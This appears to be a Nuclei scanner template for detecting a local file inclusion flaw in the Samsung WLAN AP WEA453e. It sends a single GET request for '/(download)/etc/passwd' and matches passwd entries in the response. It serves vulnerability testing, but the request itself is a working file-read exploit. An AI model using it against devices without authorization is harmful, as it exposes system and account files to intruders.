id: samsung-wlan-ap-lfi info: name: Samsung Wlan AP (WEA453e) LFI author: pikpikcu severity: critical reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,lfi requests: - method: GET path: - "{{BaseURL}}/(download)/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:[0*]:0:0" - "bin:[x]:1:1" part: body - type: status status: - 200